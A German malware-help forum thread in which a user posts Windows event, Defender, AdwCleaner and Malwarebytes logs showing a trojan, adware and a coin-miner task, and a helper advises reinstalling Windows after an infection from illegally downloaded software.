Description: Das Programm firefox.exe Version 65.0.0.6963 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 296c

Startzeit: 01d4c25621d286d0

Beendigungszeit: 4294967295

Anwendungspfad: C:\Program Files\Mozilla Firefox\firefox.exe

Bericht-ID: 17c35015-be0d-4022-8cb8-2de751e1c383

Vollständiger Name des fehlerhaften Pakets:

Relative Anwendungs-ID des fehlerhaften Pakets:

Absturztyp: Top level window is idle

Error: (02/11/2019 11:05:40 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm firefox.exe Version 65.0.0.6963 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 21d0

Startzeit: 01d4c2556012643d

Beendigungszeit: 16

Anwendungspfad: C:\Program Files\Mozilla Firefox\firefox.exe

Bericht-ID: c8ef829d-7a47-48af-a2dc-d868317542bb

Vollständiger Name des fehlerhaften Pakets:

Relative Anwendungs-ID des fehlerhaften Pakets:

Absturztyp: Unknown


Systemfehler:
=============
Error: (02/12/2019 08:13:42 AM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1084" in DCOM, als der Dienst "EventSystem" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{1BE1F766-5536-11D1-B726-00C04FB926AF}

Error: (02/12/2019 08:13:35 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-MB4THTP)
Description: Fehler "1084" in DCOM, als der Dienst "ShellHWDetection" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (02/12/2019 08:13:25 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-MB4THTP)
Description: Fehler "1084" in DCOM, als der Dienst "ShellHWDetection" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (02/12/2019 08:10:43 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-MB4THTP)
Description: Fehler "1084" in DCOM, als der Dienst "ShellHWDetection" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (02/12/2019 08:10:13 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-MB4THTP)
Description: Fehler "1084" in DCOM, als der Dienst "ShellHWDetection" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (02/12/2019 08:09:34 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-MB4THTP)
Description: Fehler "1084" in DCOM, als der Dienst "ShellHWDetection" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (02/12/2019 08:09:23 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-MB4THTP)
Description: Fehler "1084" in DCOM, als der Dienst "ShellHWDetection" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (02/12/2019 08:09:14 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-MB4THTP)
Description: Fehler "1084" in DCOM, als der Dienst "ShellHWDetection" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DD522ACC-F821-461A-A407-50B198B896DC}


Windows Defender:
===================================
Date: 2019-02-11 23:16:37.049
Description:
Die Windows Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {7B865497-BD0E-4A6A-AD8D-3FA796D69668}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: DESKTOP-MB4THTP\Fantacola

Date: 2019-02-10 20:42:14.590
Description:
Von Windows Defender Antivirus wurde Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Bearfoos.A!ml&threatid=2147731250&enterprise=0
Name: Trojan:Win32/Bearfoos.A!ml
ID: 2147731250
Schweregrad: Schwerwiegend
Kategorie: Trojaner
Pfad: file:_C:\Users\Fantacola\AppData\Local\Temp\pixel.exe
Erkennungsursprung: Lokaler Computer
Erkennungstyp: FastPath
Erkennungsquelle: Echtzeitschutz
Benutzer: DESKTOP-MB4THTP\Fantacola
Prozessname: C:\Windows\explorer.exe
Signaturversion: AV: 1.285.1271.0, AS: 1.285.1271.0, NIS: 1.285.1271.0
Modulversion: AM: 1.1.15600.4, NIS: 1.1.15600.4

Date: 2019-02-10 20:41:57.532
Description:
Von Windows Defender Antivirus wurde Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Bearfoos.A!ml&threatid=2147731250&enterprise=0
Name: Trojan:Win32/Bearfoos.A!ml
ID: 2147731250
Schweregrad: Schwerwiegend
Kategorie: Trojaner
Pfad: file:_C:\Users\Fantacola\AppData\Local\Temp\pixel.exe
Erkennungsursprung: Lokaler Computer
Erkennungstyp: FastPath
Erkennungsquelle: Echtzeitschutz
Benutzer: DESKTOP-MB4THTP\Fantacola
Prozessname: C:\Windows\explorer.exe
Signaturversion: AV: 1.285.1271.0, AS: 1.285.1271.0, NIS: 1.285.1271.0
Modulversion: AM: 1.1.15600.4, NIS: 1.1.15600.4

Date: 2019-02-10 20:41:31.817
Description:
Von Windows Defender Antivirus wurde Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Bearfoos.A!ml&threatid=2147731250&enterprise=0
Name: Trojan:Win32/Bearfoos.A!ml
ID: 2147731250
Schweregrad: Schwerwiegend
Kategorie: Trojaner
Pfad: file:_C:\Users\Fantacola\AppData\Local\Temp\pixel.exe
Erkennungsursprung: Lokaler Computer
Erkennungstyp: FastPath
Erkennungsquelle: Echtzeitschutz
Benutzer: DESKTOP-MB4THTP\Fantacola
Prozessname: C:\Windows\explorer.exe
Signaturversion: AV: 1.285.1271.0, AS: 1.285.1271.0, NIS: 1.285.1271.0
Modulversion: AM: 1.1.15600.4, NIS: 1.1.15600.4

Date: 2019-02-10 20:11:10.656
Description:
Von Windows Defender Antivirus wurde Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=Program:Win32/Bearfoos.A!ml&threatid=247604&enterprise=0
Name: Program:Win32/Bearfoos.A!ml
ID: 247604
Schweregrad: Mittel
Kategorie: Potenziell unerwünschte Software
Pfad: file:_C:\Users\Fantacola\AppData\Local\Temp\run_910706.exe; file:_C:\Users\Fantacola\AppData\Local\Temp\uhJs1DWKsRJUrK8L\1a940f42a12e64c995096e0a739c3a5d.exe; process:_pid:4352,ProcessStart:131942990842711890
Erkennungsursprung: Lokaler Computer
Erkennungstyp: FastPath
Erkennungsquelle: System
Benutzer: NT-AUTORITÄT\SYSTEM
Prozessname: C:\Users\FANTAC~1\AppData\Local\Temp\run_910706.exe
Signaturversion: AV: 1.285.1271.0, AS: 1.285.1271.0, NIS: 1.285.1271.0
Modulversion: AM: 1.1.15600.4, NIS: 1.1.15600.4

Date: 2019-02-12 07:59:42.899
Description:
Fehler von Windows Defender Antivirus beim Aktualisieren von Signaturen.
Neue Signaturversion:
Vorherige Signaturversion: 1.285.1377.0
Updatequelle: Microsoft Update-Server
Signaturtyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion:
Vorherige Modulversion: 1.1.15600.4
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden.

Date: 2019-02-12 07:49:35.242
Description:
Fehler des Windows Defender Antivirus-Echtzeitschutz-Features.
Feature: Bei Zugriff
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden.
Ursache: Die Antischadsoftware wurde aus unbekanntem Grund beendet. Möglicherweise kann das Problem durch einen Neustart des Diensts behoben werden.

Date: 2019-02-11 21:45:15.424
Description:
Fehler von Windows Defender Antivirus beim Aktualisieren von Signaturen.
Neue Signaturversion:
Vorherige Signaturversion: 1.285.1271.0
Updatequelle: Microsoft Update-Server
Signaturtyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion:
Vorherige Modulversion: 1.1.15600.4
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden.

Date: 2019-02-11 21:34:23.165
Description:
Fehler des Windows Defender Antivirus-Echtzeitschutz-Features.
Feature: Bei Zugriff
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden.
Ursache: Die Antischadsoftware wurde aus unbekanntem Grund beendet. Möglicherweise kann das Problem durch einen Neustart des Diensts behoben werden.

Date: 2019-02-11 21:16:57.541
Description:
Fehler von Windows Defender Antivirus beim Aktualisieren von Signaturen.
Neue Signaturversion:
Vorherige Signaturversion: 1.285.1271.0
Updatequelle: Microsoft Update-Server
Signaturtyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion:
Vorherige Modulversion: 1.1.15600.4
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden.

CodeIntegrity:
===================================

Date: 2019-02-11 22:47:11.499
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2019-02-11 22:44:56.564
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2019-02-11 22:44:48.974
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2019-02-11 22:44:47.015
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2019-02-11 22:44:45.718
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2019-02-11 22:44:35.941
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2019-02-11 22:42:23.924
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2019-02-11 22:42:23.062
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i5-6600 CPU @ 3.30GHz
Prozentuale Nutzung des RAM: 30%
Installierter physikalischer RAM: 8144.59 MB
Verfügbarer physikalischer RAM: 5684.66 MB
Summe virtueller Speicher: 11728.59 MB
Verfügbarer virtueller Speicher: 9676.04 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:357.53 GB) (Free:105.07 GB) NTFS
Drive d: (Volume) (Fixed) (Total:216.44 GB) (Free:87.74 GB) NTFS
Drive f: (Media) (Fixed) (Total:357.54 GB) (Free:156.53 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive g: (Volume) (Fixed) (Total:357.53 GB) (Free:231.7 GB) NTFS
Drive h: () (Fixed) (Total:216.44 GB) (Free:87.82 GB) NTFS

\\?\Volume{2c829335-0000-0000-007e-000000000000}\ (Media) (Fixed) (Total:357.54 GB) (Free:14.63 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 2C829335)
Partition 1: (Active) - (Size=357.5 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=574 GB) - (Type=05)

========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 71F20D2A)
Partition 1: (Active) - (Size=357.5 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=574 GB) - (Type=05)

==================== Ende von Addition.txt ============================
Code:
# -------------------------------
# Malwarebytes AdwCleaner 7.2.7.0
# -------------------------------
# Build:    01-30-2019
# Database: 2019-02-07.2 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    02-10-2019
# Duration: 00:00:22
# OS:      Windows 10 Home
# Cleaned:  44
# Failed:  0


***** [ Services ] *****

Deleted      mweshieldup
Deleted      mweshield

***** [ Folders ] *****

Deleted      C:\Windows\Syswow64\SSL
Deleted      C:\Program Files (x86)\Mail.Ru
Deleted      C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Mail.Ru
Deleted      C:\Users\Fantacola\AppData\Local\Mail.Ru
Deleted      C:\Program Files\My Web Shield

***** [ Files ] *****

Deleted      C:\Program Files\MOZILLA FIREFOX\DEFAULTS\PREF\SECURE_CERT.JS
Deleted      C:\Users\Fantacola\Favorites\?????? ? ?????????.url
Deleted      C:\Users\Fantacola\Favorites\Mail.Ru.url
Deleted      C:\Windows\System32\drivers\mwescontroller.sys

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted      HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\foldershare
Deleted      HKLM\Software\foldershare
Deleted      HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\mweshield
Deleted      HKLM\Software\mweshield
Deleted      HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{68AE298D-7E8A-4F53-BE55-15D2B065F6C0}
Deleted      HKLM\Software\Wow6432Node\Classes\TypeLib\{D5397E85-8AF4-414B-90FC-9F4244CD46FA}
Deleted      HKLM\Software\Classes\TypeLib\{D5397E85-8AF4-414B-90FC-9F4244CD46FA}
Deleted      HKLM\Software\Wow6432Node\Classes\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}
Deleted      HKLM\Software\Classes\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}
Deleted      HKLM\Software\Wow6432Node\Classes\Interface\{B910D9A1-9F21-484A-8650-82250DABF38E}
Deleted      HKLM\Software\Classes\Interface\{B910D9A1-9F21-484A-8650-82250DABF38E}
Deleted      HKLM\Software\Wow6432Node\Classes\Interface\{B28F9114-243E-4046-B173-11825352D18A}
Deleted      HKLM\Software\Classes\Interface\{B28F9114-243E-4046-B173-11825352D18A}
Deleted      HKLM\Software\Wow6432Node\Classes\AppID\{C81BED3B-31BD-491F-813D-78EFC2638CE1}
Deleted      HKLM\Software\Classes\AppID\{C81BED3B-31BD-491F-813D-78EFC2638CE1}
Deleted      HKLM\Software\Wow6432Node\Classes\AppID\{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}
Deleted      HKLM\Software\Classes\AppID\{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}
Deleted      HKLM\Software\Classes\CLSID\{35F4BB37-03C5-41DE-85AF-7C301390C7EC}
Deleted      HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{8E8F97CD-60B5-456F-A201-73065652D099}
Deleted      HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{8E8F97CD-60B5-456F-A201-73065652D099}
Deleted      HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E8F97CD-60B5-456F-A201-73065652D099}
Deleted      HKLM\Software\Wow6432Node\Classes\CLSID\{8E8F97CD-60B5-456F-A201-73065652D099}
Deleted      HKCU\Software\AppDataLow\Software\Mail.Ru
Deleted      HKCU\Software\Mail.Ru
Deleted      HKLM\Software\Wow6432Node\Mail.Ru
Deleted      HKCU\Software\Mozilla\NativeMessagingHosts\ru.mail.go.ext_info_host
Deleted      HKCU\Software\Google\Chrome\NativeMessagingHosts\ru.mail.go.ext_info_host
Deleted      HKLM\Software\Classes\IESearchPlugin.MailRuBHO
Deleted      HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}
Deleted      HKCU\Software\Microsoft\Internet Explorer\Main|Start Page
Deleted      HKLM\Software\Wow6432Node\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9
Deleted      HKLM\SOFTWARE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9

***** [ Chromium (and derivatives) ] *****

Deleted      ?????

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Chromium Policies
[+] Reset IE Policies
[+] Reset Proxy Settings
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [1250 octets] - [06/09/2018 22:49:22]
AdwCleaner[S01].txt - [1311 octets] - [06/09/2018 22:58:22]
AdwCleaner[S02].txt - [1372 octets] - [14/09/2018 08:01:25]
AdwCleaner[S03].txt - [1781 octets] - [18/11/2018 19:13:16]
AdwCleaner[C03].txt - [1911 octets] - [18/11/2018 19:13:41]
AdwCleaner[S04].txt - [1555 octets] - [18/11/2018 19:23:13]
AdwCleaner[C04].txt - [1819 octets] - [18/11/2018 19:24:15]
AdwCleaner[S05].txt - [5646 octets] - [10/02/2019 20:59:07]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C05].txt ##########
Code:
Malwarebytes
www.malwarebytes.com

-Protokolldetails-
Scan-Datum: 11.02.19
Scan-Zeit: 22:37
Protokolldatei: 4071ded5-2e45-11e9-9297-408d5c46e2c8.json

-Softwaredaten-
Version: 3.7.1.2839
Komponentenversion: 1.0.538
Version des Aktualisierungspakets: 1.0.9218
Lizenz: Kostenlos

-Systemdaten-
Betriebssystem: Windows 10 (Build 17763.292)
CPU: x64
Dateisystem: NTFS
Benutzer: DESKTOP-MB4THTP\Fantacola

-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Scan gestartet von: Manuell
Ergebnis: Abgeschlossen
Gescannte Objekte: 337702
Erkannte Bedrohungen: 4
In die Quarantäne verschobene Bedrohungen: 0
Abgelaufene Zeit: 11 Min., 19 Sek.

-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Erkennung
PUM: Erkennung

-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)

Modul: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 3
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{E9BE5C8D-F278-A25C-CD0E-330EBB7D274B}, Keine Aktion durch Benutzer, [5999], [601190],1.0.9218
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{6DCA2822-343D-4A2B-8956-2B6B15B3F3A2}, Keine Aktion durch Benutzer, [5999], [601190],1.0.9218
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{6DCA2822-343D-4A2B-8956-2B6B15B3F3A2}, Keine Aktion durch Benutzer, [5999], [601190],1.0.9218

Registrierungswert: 0
(keine bösartigen Elemente erkannt)

Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)

Daten-Stream: 0
(keine bösartigen Elemente erkannt)

Ordner: 0
(keine bösartigen Elemente erkannt)

Datei: 1
Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\{E9BE5C8D-F278-A25C-CD0E-330EBB7D274B}, Keine Aktion durch Benutzer, [5999], [601190],1.0.9218

Physischer Sektor: 0
(keine bösartigen Elemente erkannt)

WMI: 0
(keine bösartigen Elemente erkannt)


(end)

fantacola 14.02.2019 12:20
Scheint ein schwieriger Fall zu sein ;-)

M-K-D-B 14.02.2019 17:24
Zitat:
Zitat von fantacola (Beitrag 1712743)
Scheint ein schwieriger Fall zu sein ;-)
Ganz im Gegenteil... sehr einfach sogar.
Leider hast du dir selbst geantwotet, daher hat kein Helfer dein Thema als "offen" wahrgenommen. :D ;)



Zitat:
Dumm genug aber ich habe einen PS360 ERmu installiert und eben verbotenerweise das vermeintliche BIOS dazu besorgt. Danach ging die Chausse los..mailru, wajan und wahrscheinlich noch anderes...
Bitte lesen:
Cracks, Keygens und andere illegale Software

Für dich gibt es nur den Weg einer Windows Neuinstallation. Eine andere Hilfe gibt es für sowas nicht.

Für die Zeit nach der Neuinstallation: Cleanup & Maßnahmen zur Absicherung des Rechners


Alle Zeitangaben in WEZ +1. Es ist jetzt 20:06 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131